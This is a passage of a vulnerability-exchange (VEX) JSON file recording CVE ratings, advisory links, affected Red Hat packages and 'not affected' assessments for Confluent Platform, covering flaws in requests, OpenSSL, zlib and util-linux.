          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        377
      ],
      "description": "Requests is a HTTP library. Prior to version 2.33.0, the `requests.utils.extract_zipped_paths()` utility function uses a predictable filename when extracting files from zip archives into the system temporary directory. If the target file already exists, it is reused without validation. A local attacker with write access to the temp directory could pre-create a malicious file that would be loaded in place of the legitimate one. Standard usage of the Requests library is not affected by this vulnerability. Only applications that call `extract_zipped_paths()` directly are impacted. Starting in version 2.33.0, the library extracts files to a non-deterministic location. If developers are unable to upgrade, they can set `TMPDIR` in their environment to a directory with restricted write access.",
      "recommendation": "; Upgrade requests to version 2.33.0",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-25645"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-25645"
        },
        {
          "url": "https://github.com/psf/requests"
        },
        {
          "url": "https://github.com/psf/requests/commit/66d21cb07bd6255b1280291c4fafb71803cdb3b7"
        },
        {
          "url": "https://github.com/psf/requests/releases/tag/v2.33.0"
        },
        {
          "url": "https://github.com/psf/requests/security/advisories/GHSA-gc5v-m9x4-r6x2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25645"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-25645"
        }
      ],
      "published": "2026-03-25T17:16:52+00:00",
      "updated": "2026-06-17T10:25:00+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/requests@2.32.5",
          "versions": [
            {
              "version": "2.32.5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "21.3.1-2.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-pip-wheel@21.3.1-2.el9_8?arch=noarch&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-2673",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        757
      ],
      "description": "Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected\npreferred key exchange group when its key exchange group configuration includes\nthe default by using the 'DEFAULT' keyword.\n\nImpact summary: A less preferred key exchange may be used even when a more\npreferred group is supported by both client and server, if the group\nwas not included among the client's initial predicated keyshares.\nThis will sometimes be the case with the new hybrid post-quantum groups,\nif the client chooses to defer their use until specifically requested by\nthe server.\n\nIf an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to\ninterpolate the built-in default group list into its own configuration, perhaps\nadding or removing specific elements, then an implementation defect causes the\n'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups\nwere treated as a single sufficiently secure 'tuple', with the server not\nsending a Hello Retry Request (HRR) even when a group in a more preferred tuple\nwas mutually supported.\n\nAs a result, the client and server might fail to negotiate a mutually supported\npost-quantum key agreement group, such as 'X25519MLKEM768', if the client's\nconfiguration results in only 'classical' groups (such as 'X25519' being the\nonly ones in the client's initial keyshare prediction).\n\nOpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS\n1.3 key agreement group on TLS servers.  The old syntax had a single 'flat'\nlist of groups, and treated all the supported groups as sufficiently secure.\nIf any of the keyshares predicted by the client were supported by the server\nthe most preferred among these was selected, even if other groups supported by\nthe client, but not included in the list of predicted keyshares would have been\nmore preferred, if included.\n\nThe new syntax partitions the groups into distinct 'tuples' of roughly\nequivalent security.  Within each tuple the most preferred group included among\nthe client's predicted keyshares is chosen, but if the client supports a group\nfrom a more preferred tuple, but did not predict any corresponding keyshares,\nthe server will ask the client to retry the ClientHello (by issuing a Hello\nRetry Request or HRR) with the most preferred mutually supported group.\n\nThe above works as expected when the server's configuration uses the built-in\ndefault group list, or explicitly defines its own list by directly defining the\nvarious desired groups and group 'tuples'.\n\nNo OpenSSL FIPS modules are affected by this issue, the code in question lies\noutside the FIPS boundary.\n\nOpenSSL 3.6 and 3.5 are vulnerable to this issue.\n\nOpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released.\nOpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released.\n\nOpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-2673"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/13/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-2673"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-wj64-gh9j-xm82"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2157c9d81f7b0bd7dfa25b960e928ec28e8dd63f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/85977e013f32ceb96aa034c0e741adddc1a05e34"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2673"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260313.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-2673"
        }
      ],
      "published": "2026-03-13T19:54:34+00:00",
      "updated": "2026-06-17T10:31:30+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.0.7-11.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.0.7-11.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-fips-provider-so@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-fips-provider@3.0.7-11.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-27171",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27171"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/"
        },
        {
          "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27171"
        },
        {
          "url": "https://github.com/advisories/GHSA-h858-mf2m-8jf4"
        },
        {
          "url": "https://github.com/madler/zlib/issues/904"
        },
        {
          "url": "https://github.com/madler/zlib/releases/tag/v1.3.2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27171"
        }
      ],
      "published": "2026-02-18T04:16:01+00:00",
      "updated": "2026-06-17T10:26:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.2.11-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/zlib@1.2.11-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-27456",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        59,
        269,
        367
      ],
      "description": "util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27456"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27456"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27456"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-jgcxwcxt3sxd.toml"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/releases/tag/v2.41.4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27456"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27456"
        }
      ],
      "published": "2026-04-03T22:16:25+00:00",
      "updated": "2026-07-24T22:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.37.4-25.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.37.4-25.el9",
              "status": "affected"
